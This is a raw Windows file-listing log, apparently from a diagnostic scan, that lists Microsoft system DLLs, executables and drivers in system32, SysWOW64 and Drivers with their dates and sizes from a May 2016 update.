2016-05-19 23:18 - 2015-11-22 05:42 - 00589312 _____ (Microsoft Corporation) C:\Windows\system32\MbaeApi.dll
2016-05-19 23:18 - 2015-11-22 05:42 - 00138240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ETWCoreUIComponentsResources.dll
2016-05-19 23:18 - 2015-11-22 05:36 - 01042432 _____ (Microsoft Corporation) C:\Windows\system32\BingOnlineServices.dll
2016-05-19 23:18 - 2015-11-22 05:34 - 02843136 _____ (Microsoft Corporation) C:\Windows\system32\cdp.dll
2016-05-19 23:18 - 2015-11-22 05:32 - 00340480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PlayToDevice.dll
2016-05-19 23:18 - 2015-11-22 05:31 - 00470528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MbaeApi.dll
2016-05-19 23:18 - 2015-11-22 05:28 - 00870400 _____ (Microsoft Corporation) C:\Windows\system32\wpncore.dll
2016-05-19 23:18 - 2015-11-22 05:26 - 03355136 _____ (Microsoft Corporation) C:\Windows\system32\msftedit.dll
2016-05-19 23:18 - 2015-11-22 05:26 - 00709120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BingOnlineServices.dll
2016-05-19 23:18 - 2015-11-22 05:20 - 01860096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdp.dll
2016-05-19 23:18 - 2015-11-22 05:18 - 00697856 _____ (Microsoft Corporation) C:\Windows\system32\PlayToManager.dll
2016-05-19 23:18 - 2015-11-22 05:18 - 00458752 _____ (Microsoft Corporation) C:\Windows\system32\PlayToDevice.dll
2016-05-19 23:18 - 2015-11-22 05:17 - 02680320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msftedit.dll
2016-05-19 23:18 - 2015-11-22 05:11 - 00517632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PlayToManager.dll
2016-05-19 23:17 - 2016-05-06 00:05 - 00241664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptngc.dll
2016-05-19 23:17 - 2016-05-05 23:53 - 00351232 _____ (Microsoft Corporation) C:\Windows\system32\NgcCtnr.dll
2016-05-19 23:17 - 2016-05-05 23:49 - 00289792 _____ (Microsoft Corporation) C:\Windows\system32\NgcCtnrSvc.dll
2016-05-19 23:17 - 2016-05-05 23:44 - 00582656 _____ (Microsoft Corporation) C:\Windows\system32\ngccredprov.dll
2016-05-19 23:17 - 2016-05-05 23:43 - 00320000 _____ (Microsoft Corporation) C:\Windows\system32\cryptngc.dll
2016-05-19 23:17 - 2016-04-23 01:26 - 00707608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-05-19 23:17 - 2016-04-23 01:24 - 00638816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fvevol.sys
2016-05-19 23:17 - 2016-04-23 01:24 - 00335712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2016-05-19 23:17 - 2016-04-23 01:24 - 00099680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pdc.sys
2016-05-19 23:17 - 2016-04-23 01:22 - 01161120 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-05-19 23:17 - 2016-04-23 01:13 - 00306832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wlanapi.dll
2016-05-19 23:17 - 2016-04-23 01:12 - 00451928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFCaptureEngine.dll
2016-05-19 23:17 - 2016-04-23 01:11 - 00498960 _____ (Microsoft Corporation) C:\Windows\system32\MFCaptureEngine.dll
2016-05-19 23:17 - 2016-04-23 01:11 - 00390496 _____ (Microsoft Corporation) C:\Windows\system32\wlanapi.dll
2016-05-19 23:17 - 2016-04-23 01:11 - 00131424 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ufxsynopsys.sys
2016-05-19 23:17 - 2016-04-23 01:09 - 00565600 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncHost.exe
2016-05-19 23:17 - 2016-04-23 01:09 - 00465760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSyncHost.exe
2016-05-19 23:17 - 2016-04-23 01:07 - 00204048 _____ (Microsoft Corporation) C:\Windows\system32\rsaenh.dll
2016-05-19 23:17 - 2016-04-23 01:07 - 00183904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rsaenh.dll
2016-05-19 23:17 - 2016-04-23 01:06 - 00291360 _____ (Microsoft Corporation) C:\Windows\system32\wininit.exe
2016-05-19 23:17 - 2016-04-23 01:02 - 00188256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxAllUserStore.dll
2016-05-19 23:17 - 2016-04-23 01:01 - 00619296 _____ (Microsoft Corporation) C:\Windows\system32\d3d10level9.dll
2016-05-19 23:17 - 2016-04-23 01:01 - 00513368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10level9.dll
2016-05-19 23:17 - 2016-04-23 01:01 - 00393568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2016-05-19 23:17 - 2016-04-23 01:01 - 00217440 _____ (Microsoft Corporation) C:\Windows\system32\AppxAllUserStore.dll
2016-05-19 23:17 - 2016-04-23 01:00 - 01522152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2016-05-19 23:17 - 2016-04-23 01:00 - 00550656 _____ (Microsoft Corporation) C:\Windows\system32\directmanipulation.dll
2016-05-19 23:17 - 2016-04-23 01:00 - 00453472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\directmanipulation.dll
2016-05-19 23:17 - 2016-04-23 01:00 - 00058208 _____ (Microsoft Corporation) C:\Windows\system32\dwminit.dll
2016-05-19 23:17 - 2016-04-23 00:56 - 00534872 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBHUB3.SYS
2016-05-19 23:17 - 2016-04-23 00:34 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbser.sys
2016-05-19 23:17 - 2016-04-23 00:34 - 00059392 _____ (Microsoft Corporation) C:\Windows\system32\hmkd.dll
2016-05-19 23:17 - 2016-04-23 00:34 - 00048128 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2016-05-19 23:17 - 2016-04-23 00:33 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\UcmCx.sys
2016-05-19 23:17 - 2016-04-23 00:32 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-05-19 23:17 - 2016-04-23 00:29 - 00192000 _____ (Microsoft Corporation) C:\Windows\system32\provisioningcsp.dll
2016-05-19 23:17 - 2016-04-23 00:29 - 00151040 _____ (Microsoft Corporation) C:\Windows\system32\VEStoreEventHandlers.dll
2016-05-19 23:17 - 2016-04-23 00:29 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\filecrypt.sys
2016-05-19 23:17 - 2016-04-23 00:29 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\MDMAppInstaller.exe
2016-05-19 23:17 - 2016-04-23 00:29 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hmkd.dll
2016-05-19 23:17 - 2016-04-23 00:28 - 00130560 _____ (Microsoft Corporation) C:\Windows\system32\CloudDomainJoinDataModelServer.dll
2016-05-19 23:17 - 2016-04-23 00:28 - 00127488 _____ (Microsoft Corporation) C:\Windows\system32\VEDataLayerHelpers.dll
2016-05-19 23:17 - 2016-04-23 00:28 - 00104448 _____ (Microsoft Corporation) C:\Windows\system32\BluetoothApis.dll
2016-05-19 23:17 - 2016-04-23 00:26 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\wpdbusenum.dll
2016-05-19 23:17 - 2016-04-23 00:25 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\StorSvc.dll
2016-05-19 23:17 - 2016-04-23 00:25 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wcmcsp.dll
2016-05-19 23:17 - 2016-04-23 00:24 - 00689152 _____ (Microsoft Corporation) C:\Windows\system32\ieproxy.dll
2016-05-19 23:17 - 2016-04-23 00:24 - 00292864 _____ (Microsoft Corporation) C:\Windows\system32\provengine.dll
2016-05-19 23:17 - 2016-04-23 00:24 - 00287232 _____ (Microsoft Corporation) C:\Windows\system32\provhandlers.dll
2016-05-19 23:17 - 2016-04-23 00:24 - 00181248 _____ (Microsoft Corporation) C:\Windows\system32\shacct.dll
2016-05-19 23:17 - 2016-04-23 00:24 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\SubscriptionMgr.dll
2016-05-19 23:17 - 2016-04-23 00:24 - 00084480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VEDataLayerHelpers.dll
2016-05-19 23:17 - 2016-04-23 00:23 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\ListSvc.dll
2016-05-19 23:17 - 2016-04-23 00:23 - 00179712 _____ (Microsoft Corporation) C:\Windows\system32\BrowserSettingSync.dll
2016-05-19 23:17 - 2016-04-23 00:23 - 00080896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BluetoothApis.dll
2016-05-19 23:17 - 2016-04-23 00:21 - 00479232 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-05-19 23:17 - 2016-04-23 00:20 - 00307200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieproxy.dll
2016-05-19 23:17 - 2016-04-23 00:20 - 00137728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shacct.dll
2016-05-19 23:17 - 2016-04-23 00:19 - 00970752 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-05-19 23:17 - 2016-04-23 00:19 - 00140800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BrowserSettingSync.dll
2016-05-19 23:17 - 2016-04-23 00:18 - 00804352 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-05-19 23:17 - 2016-04-23 00:18 - 00585728 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2016-05-19 23:17 - 2016-04-23 00:18 - 00515072 _____ (Microsoft Corporation) C:\Windows\system32\OneDriveSettingSyncProvider.dll
2016-05-19 23:17 - 2016-04-23 00:18 - 00436736 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentClient.dll
2016-05-19 23:17 - 2016-04-23 00:17 - 00388608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-05-19 23:17 - 2016-04-23 00:16 - 00848896 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2016-05-19 23:17 - 2016-04-23 00:15 - 00792064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-05-19 23:17 - 2016-04-23 00:15 - 00400896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OneDriveSettingSyncProvider.dll
2016-05-19 23:17 - 2016-04-23 00:14 - 00870912 _____ (Microsoft Corporation) C:\Windows\system32\MPSSVC.dll
2016-05-19 23:17 - 2016-04-23 00:14 - 00647680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-05-19 23:17 - 2016-04-23 00:14 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppXDeploymentClient.dll
2016-05-19 23:17 - 2016-04-23 00:13 - 00705536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2016-05-19 23:17 - 2016-04-23 00:12 - 00667648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AzureSettingSyncProvider.dll
2016-05-19 23:17 - 2016-04-23 00:07 - 00848896 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2016-05-19 23:17 - 2016-04-23 00:05 - 01626624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2016-05-19 23:17 - 2016-04-23 00:05 - 00613376 _____ (Microsoft Corporation) C:\Windows\system32\SettingSync.dll
2016-05-19 23:17 - 2016-04-23 00:03 - 02193408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll
2016-05-19 23:17 - 2016-04-23 00:03 - 00503296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSync.dll
2016-05-19 23:17 - 2016-04-23 00:01 - 04775424 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2016-05-19 23:17 - 2016-04-22 23:45 - 00461824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CoreMessaging.dll
2016-05-19 23:17 - 2016-04-02 00:13 - 00369912 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2016-05-19 23:17 - 2016-04-02 00:10 - 00770640 _____ (Microsoft Corporation) C:\Windows\system32\iuilp.dll
2016-05-19 23:17 - 2016-04-02 00:10 - 00374008 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsAdminFlows.exe
2016-05-19 23:17 - 2016-04-01 23:25 - 00278528 _____ (Microsoft Corporation) C:\Windows\system32\NotificationObjFactory.dll
2016-05-19 23:17 - 2016-04-01 23:25 - 00239104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NotificationObjFactory.dll
2016-05-19 23:17 - 2016-03-29 06:23 - 00277856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sdbus.sys
2016-05-19 23:17 - 2016-03-29 06:15 - 00100232 _____ (Microsoft Corporation) C:\Windows\system32\omadmapi.dll
2016-05-19 23:17 - 2016-03-29 06:11 - 00686976 _____ (Microsoft Corporation) C:\Windows\system32\dnsapi.dll
2016-05-19 23:17 - 2016-03-29 06:05 - 01152864 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ndis.sys
2016-05-19 23:17 - 2016-03-29 06:02 - 00334736 _____ (Microsoft Corporation) C:\Windows\system32\policymanager.dll
2016-05-19 23:17 - 2016-03-29 05:25 - 00058400 _____ (Microsoft Corporation) C:\Windows\system32\SensorsNativeApi.dll
2016-05-19 23:17 - 2016-03-29 05:19 - 00296488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\policymanager.dll
2016-05-19 23:17 - 2016-03-29 05:18 - 00185184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsd.sys
2016-05-19 23:17 - 2016-03-29 05:11 - 00074424 _____ (Microsoft Corporation) C:\Windows\system32\easinvoker.exe
2016-05-19 23:17 - 2016-03-29 05:10 - 00110584 _____ (Microsoft Corporation) C:\Windows\system32\srvcli.dll
2016-05-19 23:17 - 2016-03-29 05:09 - 00078040 _____ (Microsoft Corporation) C:\Windows\system32\wkscli.dll
2016-05-19 23:17 - 2016-03-29 05:08 - 00261376 _____ (Microsoft Corporation) C:\Windows\system32\LsaIso.exe
2016-05-19 23:17 - 2016-03-29 05:07 - 00081144 _____ (Microsoft Corporation) C:\Windows\system32\netapi32.dll
2016-05-19 23:17 - 2016-03-29 04:41 - 00051128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SensorsNativeApi.dll
2016-05-19 23:17 - 2016-03-29 04:26 - 00073872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srvcli.dll
2016-05-19 23:17 - 2016-03-29 04:25 - 00056320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wkscli.dll
2016-05-19 23:17 - 2016-03-29 04:23 - 00069744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\netapi32.dll
2016-05-19 23:17 - 2016-03-29 04:07 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\policymanagerprecheck.dll
2016-05-19 23:17 - 2016-03-29 04:07 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\wsdchngr.dll
2016-05-19 23:17 - 2016-03-29 04:00 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\fveskybackup.dll
2016-05-19 23:17 - 2016-03-29 03:59 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\LicenseManagerShellext.exe
2016-05-19 23:17 - 2016-03-29 03:58 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-05-19 23:17 - 2016-03-29 03:57 - 00058368 _____ (Microsoft Corporation) C:\Windows\system32\browcli.dll
2016-05-19 23:17 - 2016-03-29 03:55 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\serial.sys
2016-05-19 23:17 - 2016-03-29 03:54 - 00147456 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-05-19 23:17 - 2016-03-29 03:51 - 00087040 _____ (Microsoft Corporation) C:\Windows\system32\tzautoupdate.dll
2016-05-19 23:17 - 2016-03-29 03:50 - 00088576 _____ (Microsoft Corporation) C:\Windows\system32\AppxSysprep.dll
2016-05-19 23:17 - 2016-03-29 03:50 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\OnDemandConnRouteHelper.dll
2016-05-19 23:17 - 2016-03-29 03:50 - 00033280 _____ (Microsoft Corporation) C:\Windows\system32\wuautoappupdate.dll
2016-05-19 23:17 - 2016-03-29 03:49 - 00245760 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\BthLEEnum.sys
2016-05-19 23:17 - 2016-03-29 03:48 - 00144896 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Devices.dll
2016-05-19 23:17 - 2016-03-29 03:46 - 00134656 _____ (Microsoft Corporation) C:\Windows\system32\browser.dll
2016-05-19 23:17 - 2016-03-29 03:35 - 00411648 _____ (Microsoft Corporation) C:\Windows\system32\oleacc.dll
2016-05-19 23:17 - 2016-03-29 03:35 - 00239616 _____ (Microsoft Corporation) C:\Windows\system32\credprovhost.dll
2016-05-19 23:17 - 2016-03-29 03:34 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\dnsrslvr.dll
2016-05-19 23:17 - 2016-03-29 03:33 - 00174592 _____ (Microsoft Corporation) C:\Windows\system32\easwrt.dll
2016-05-19 23:17 - 2016-03-29 03:30 - 00161792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-05-19 23:17 - 2016-03-29 03:21 - 00330240 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-05-19 23:17 - 2016-03-29 03:20 - 00026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsdchngr.dll
2016-05-19 23:17 - 2016-03-29 03:18 - 00676352 _____ (Microsoft Corporation) C:\Windows\system32\WSDApi.dll
2016-05-19 23:17 - 2016-03-29 03:17 - 00708608 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Authentication.Web.Core.dll
2016-05-19 23:17 - 2016-03-29 03:11 - 00043520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\browcli.dll
2016-05-19 23:17 - 2016-03-29 03:08 - 00841216 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-05-19 23:17 - 2016-03-29 03:08 - 00118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-05-19 23:17 - 2016-03-29 03:04 - 00103936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Devices.dll
2016-05-19 23:17 - 2016-03-29 03:00 - 00175616 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Core.TextInput.dll
2016-05-19 23:17 - 2016-03-29 02:59 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\fveapibase.dll
2016-05-19 23:17 - 2016-03-29 02:59 - 00119808 _____ (Microsoft Corporation) C:\Windows\system32\BitLockerDeviceEncryption.exe
2016-05-19 23:17 - 2016-03-29 02:53 - 00323072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleacc.dll
2016-05-19 23:17 - 2016-03-29 02:53 - 00193024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credprovhost.dll
2016-05-19 23:17 - 2016-03-29 02:42 - 00250880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-05-19 23:17 - 2016-03-29 02:41 - 00129024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AboveLockAppHost.dll
2016-05-19 23:17 - 2016-03-29 02:39 - 00496128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2016-05-19 23:17 - 2016-03-29 02:32 - 00128512 _____ (Microsoft Corporation) C:\Windows\system32\dmcsps.dll
2016-05-19 23:17 - 2016-03-29 02:29 - 00256000 _____ (Microsoft Corporation) C:\Windows\system32\accountaccessor.dll
2016-05-19 23:17 - 2016-03-29 02:27 - 00133632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Core.TextInput.dll
2016-05-19 23:17 - 2016-03-29 01:35 - 00821248 _____ (Microsoft Corporation) C:\Windows\system32\fvewiz.dll
2016-05-19 23:17 - 2016-03-29 01:28 - 00324608 _____ (Microsoft Corporation) C:\Windows\system32\fvecpl.dll
2016-05-19 23:17 - 2016-03-29 01:27 - 00794112 _____ (Microsoft Corporation) C:\Windows\system32\BFE.DLL
2016-05-19 23:17 - 2016-03-29 01:26 - 00402432 _____ (Microsoft Corporation) C:\Windows\system32\FWPUCLNT.DLL
2016-05-19 23:17 - 2016-03-29 01:25 - 00269824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FWPUCLNT.DLL
2016-05-19 23:17 - 2016-03-29 01:21 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\basesrv.dll
2016-05-19 23:17 - 2016-03-01 01:22 - 00709688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsvr.dll
2016-05-19 23:17 - 2016-02-24 04:54 - 00127840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBSTOR.SYS
2016-05-19 23:17 - 2016-02-24 04:39 - 00141560 _____ (Microsoft Corporation) C:\Windows\system32\AuthHost.exe
2016-05-19 23:17 - 2016-02-24 04:11 - 00258280 _____ (Microsoft Corporation) C:\Windows\system32\sqmapi.dll
2016-05-19 23:17 - 2016-02-24 04:09 - 00147808 _____ (Microsoft Corporation) C:\Windows\system32\wermgr.exe
2016-05-19 23:17 - 2016-02-24 03:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\PimIndexMaintenanceClient.dll
2016-05-19 23:17 - 2016-02-24 03:35 - 00220064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sqmapi.dll
2016-05-19 23:17 - 2016-02-24 03:33 - 00141664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wermgr.exe
2016-05-19 23:17 - 2016-02-24 03:30 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\wfapigp.dll
2016-05-19 23:17 - 2016-02-24 03:28 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\POSyncServices.dll
2016-05-19 23:17 - 2016-02-24 03:23 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2016-05-19 23:17 - 2016-02-24 03:23 - 00068096 _____ (Microsoft Corporation) C:\Windows\system32\UserDataPlatformHelperUtil.dll
2016-05-19 23:17 - 2016-02-24 03:20 - 00195072 _____ (Microsoft Corporation) C:\Windows\system32\VCardParser.dll
2016-05-19 23:17 - 2016-02-24 03:19 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\dssvc.dll
2016-05-19 23:17 - 2016-02-24 03:19 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\seclogon.dll
2016-05-19 23:17 - 2016-02-24 03:14 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\ExSMime.dll
2016-05-19 23:17 - 2016-02-24 03:13 - 00121856 _____ (Microsoft Corporation) C:\Windows\system32\AppointmentActivation.dll
2016-05-19 23:17 - 2016-02-24 03:12 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\cemapi.dll
2016-05-19 23:17 - 2016-02-24 03:12 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\PhoneCallHistoryApis.dll
2016-05-19 23:17 - 2016-02-24 03:10 - 00093184 _____ (Microsoft Corporation) C:\Windows\system32\wpninprc.dll
2016-05-19 23:17 - 2016-02-24 03:09 - 00258560 _____ (Microsoft Corporation) C:\Windows\system32\UserDataAccountApis.dll
2016-05-19 23:17 - 2016-02-24 03:09 - 00161792 _____ (Microsoft Corporation) C:\Windows\system32\AppxSip.dll
2016-05-19 23:17 - 2016-02-24 03:07 - 00252928 _____ (Microsoft Corporation) C:\Windows\system32\PimIndexMaintenance.dll
2016-05-19 23:17 - 2016-02-24 03:02 - 00161280 _____ (Microsoft Corporation) C:\Windows\system32\CallHistoryClient.dll
2016-05-19 23:17 - 2016-02-24 03:01 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\AuthBroker.dll
2016-05-19 23:17 - 2016-02-24 03:00 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Scanners.dll
2016-05-19 23:17 - 2016-02-24 02:59 - 00318976 _____ (Microsoft Corporation) C:\Windows\system32\domgmt.dll
2016-05-19 23:17 - 2016-02-24 02:58 - 00685568 _____ (Microsoft Corporation) C:\Windows\system32\scapi.dll
2016-05-19 23:17 - 2016-02-24 02:55 - 00790528 _____ (Microsoft Corporation) C:\Windows\system32\EmailApis.dll
2016-05-19 23:17 - 2016-02-24 02:55 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\PackageStateRoaming.dll
2016-05-19 23:17 - 2016-02-24 02:55 - 00018944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExtrasXmlParser.dll
2016-05-19 23:17 - 2016-02-24 02:54 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\FirewallAPI.dll
2016-05-19 23:17 - 2016-02-24 02:54 - 00288768 _____ (Microsoft Corporation) C:\Windows\system32\vaultcli.dll
2016-05-19 23:17 - 2016-02-24 02:54 - 00228352 _____ (Microsoft Corporation) C:\Windows\system32\wsqmcons.exe
2016-05-19 23:17 - 2016-02-24 02:53 - 00089088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTimeUtil.dll
2016-05-19 23:17 - 2016-02-24 02:52 - 00451584 _____ (Microsoft Corporation) C:\Windows\system32\werui.dll
2016-05-19 23:17 - 2016-02-24 02:49 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\ChatApis.dll
2016-05-19 23:17 - 2016-02-24 02:44 - 00915456 _____ (Microsoft Corporation) C:\Windows\system32\configurationclient.dll
2016-05-19 23:17 - 2016-02-24 02:44 - 00056320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\POSyncServices.dll
2016-05-19 23:17 - 2016-02-24 02:40 - 00078848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2016-05-19 23:17 - 2016-02-24 02:38 - 00150528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VCardParser.dll
2016-05-19 23:17 - 2016-02-24 02:36 - 01847808 _____ (Microsoft Corporation) C:\Windows\system32\WMPDMC.exe
2016-05-19 23:17 - 2016-02-24 02:32 - 00223744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExSMime.dll
2016-05-19 23:17 - 2016-02-24 02:32 - 00098304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppointmentActivation.dll
2016-05-19 23:17 - 2016-02-24 02:31 - 00200704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cemapi.dll
2016-05-19 23:17 - 2016-02-24 02:31 - 00169984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhoneCallHistoryApis.dll
2016-05-19 23:17 - 2016-02-24 02:28 - 00196608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataAccountApis.dll
2016-05-19 23:17 - 2016-02-24 02:28 - 00135168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxSip.dll
2016-05-19 23:17 - 2016-02-24 02:25 - 00401408 _____ (Microsoft Corporation) C:\Windows\system32\sharemediacpl.dll
2016-05-19 23:17 - 2016-02-24 02:21 - 00168448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Scanners.dll
2016-05-19 23:17 - 2016-02-24 02:18 - 00575488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EmailApis.dll
2016-05-19 23:17 - 2016-02-24 02:18 - 00184832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PackageStateRoaming.dll
2016-05-19 23:17 - 2016-02-24 02:17 - 00369664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FirewallAPI.dll
2016-05-19 23:17 - 2016-02-24 02:16 - 00394752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\werui.dll
2016-05-19 23:17 - 2016-02-24 02:13 - 00540160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ChatApis.dll
2016-05-19 23:17 - 2016-02-24 01:43 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\fwbase.dll
2016-05-19 23:17 - 2016-02-24 01:22 - 00163328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fwbase.dll
2016-05-19 23:17 - 2016-02-23 07:25 - 00563552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\acpi.sys
2016-05-19 23:17 - 2016-02-23 07:15 - 00779384 _____ (Microsoft Corporation) C:\Windows\system32\taskschd.dll
2016-05-19 23:17 - 2016-02-23 06:31 - 00476728 _____ (Microsoft Corporation) C:\Windows\system32\msvproc.dll
2016-05-19 23:17 - 2016-02-23 06:31 - 00408120 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2016-05-19 23:17 - 2016-02-23 06:17 - 00146272 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-05-19 23:17 - 2016-02-23 05:40 - 00430944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-05-19 23:17 - 2016-02-23 05:20 - 00238592 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\xboxgip.sys
2016-05-19 23:17 - 2016-02-23 05:12 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\provpackageapidll.dll
